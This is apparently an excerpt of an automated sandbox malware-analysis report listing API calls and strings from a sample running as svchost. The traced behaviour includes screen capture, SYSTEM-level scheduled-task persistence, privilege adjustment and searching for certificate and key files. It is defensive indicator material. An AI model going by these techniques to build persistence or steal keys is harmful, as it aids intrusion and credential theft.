                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,0268FB50,00000000), ref: 02652C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02652C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02652C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02652C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02652C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02652C8B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02652D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02652D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02652D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02652D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02652D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02652D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02652D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02652D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0268FB50), ref: 02652DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02652DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0268FB50), ref: 02652DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02652DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02652DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02652DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB50), ref: 02652DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02652E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02652E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02652E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02652E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 7577580Fa$757758cda$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-1351715047
                                                                                                                                                                                                              • Opcode ID: d2c32cebc1655c14b68ad51a72c02c6c882aee458dfe7aa3a555efb650c27e3f
                                                                                                                                                                                                              • Instruction ID: cd7d9b208053cb7d9946602f725b06a7a765653690d4e2ce96cbdd6c10c20688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2c32cebc1655c14b68ad51a72c02c6c882aee458dfe7aa3a555efb650c27e3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CC1D331644351BBD7209F649CA9FAF7BA8EF88704F414A18FD869B2C0DB70D94587A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1561668989
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02652053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02652064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02652079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0265208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 026520A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 026520D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 026520EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0265215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265216F
                                                                                                                                                                                                              • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0265218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(0265255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 026521A6
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026521CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 026521EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0265255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02652209
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02652214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0265223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 0265224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02652260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02652270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0265227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 0265228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 026522A3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 026522B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026522CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026522DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 026522EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 026522FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 02652308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0265230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02652323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02652335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02652340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0265234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02652358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 532523266-808120212
                                                                                                                                                                                                              • Opcode ID: eb14b49e7eb6849ae1a113431729309f9511cbc561e2ccd68944fd852b1d2d5e
                                                                                                                                                                                                              • Instruction ID: 3b52f513f0460eccbb7450c3ad2c4e22b00da0600c9e807573f3803a88495ca1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb14b49e7eb6849ae1a113431729309f9511cbc561e2ccd68944fd852b1d2d5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF9149B2544310BFE3109F64DC98EAFBBECFB88744F415A1DFA8692240DB709945CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767), ref: 0265F9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269DDC8,00000000), ref: 0265FA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FA2F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269DDC8), ref: 0265FA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0269DDC8,00000000), ref: 0265FA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(0269DDC8), ref: 0265FA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?), ref: 0265FAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269D998,00000000), ref: 0265FB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FB17
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269D998), ref: 0265FB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269D998,00000000), ref: 0265FB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FB69
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269D998), ref: 0265FB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265FB91
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265FBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 0265FC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 0265FC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 0265FC6F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265FC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265FC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265FC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265FCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265FCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265FCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265FCBD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 8a99a767$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 959110331-3809332364
                                                                                                                                                                                                              • Opcode ID: b80cd0c67275d0d999bc52061bd0d9ebffa3c93fc9a9859f6bb182d63aeb3e03
                                                                                                                                                                                                              • Instruction ID: d1aa741ef4c35775e0b9e395d0301377e6eb9c4d46ea46bd17c3bfdeeffa7cf1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b80cd0c67275d0d999bc52061bd0d9ebffa3c93fc9a9859f6bb182d63aeb3e03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7991F030A40755AFEB11AB789C68BAE7BE8AF0B300F459655EC86D7340EF708944C791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02647C80: IsUserAnAdmin.SHELL32 ref: 02647C8A
                                                                                                                                                                                                                • Part of subcall function 02647C80: memset.MSVCRT ref: 02647CC1
                                                                                                                                                                                                                • Part of subcall function 02647C80: memset.MSVCRT ref: 02647CD9
                                                                                                                                                                                                                • Part of subcall function 02647C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,76F8F380), ref: 02647CFB
                                                                                                                                                                                                                • Part of subcall function 02647C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,76F8F380), ref: 02647D21
                                                                                                                                                                                                                • Part of subcall function 02647C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,76F8F380), ref: 02647DAD
                                                                                                                                                                                                                • Part of subcall function 02647C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,76F8F380), ref: 02647DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02648105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02648112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02648124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02648145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02648157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 026481A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 026481D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,75775A79a,75775af8a), ref: 02648205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,75775A79a,75775af8a), ref: 02648253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02648285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 026482A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 026482BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026482CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026482F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                              • String ID: 75775A79a$75775af8a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 2871222221-722063887
                                                                                                                                                                                                              • Opcode ID: a80eaba03a7ec76da81b6c6b725d8a0b7934bfb2de30d1f6acd5bd9bfbd34703
                                                                                                                                                                                                              • Instruction ID: 0bce0c42915ade215b24e6a556cfc9d89ef47a57efc624f2f4617e2b552889a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80eaba03a7ec76da81b6c6b725d8a0b7934bfb2de30d1f6acd5bd9bfbd34703
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C651E930981311BBE7206BB09C5CF2F3B6DAF44B55F454A08F94697280DFB4D850CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265C86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265C8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265C8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265C8F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265C8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265C90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265C911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 0265C923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 0265C936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 0265C947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265C992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265C99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: 8A99A689$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 3980609930-2815722089
                                                                                                                                                                                                              • Opcode ID: 54afc873f3d64ea5507e232adca0bb3c9c88a1214050ccfa5769491acff926cd
                                                                                                                                                                                                              • Instruction ID: bf0d7e176d3c6d8c056952309e571b0927fd4a8146051ec8910be58e67a46e47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54afc873f3d64ea5507e232adca0bb3c9c88a1214050ccfa5769491acff926cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53913631D40769ABDB26DB74CC98BEE7FA8AF49704F04469AED46D7340DB708984CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
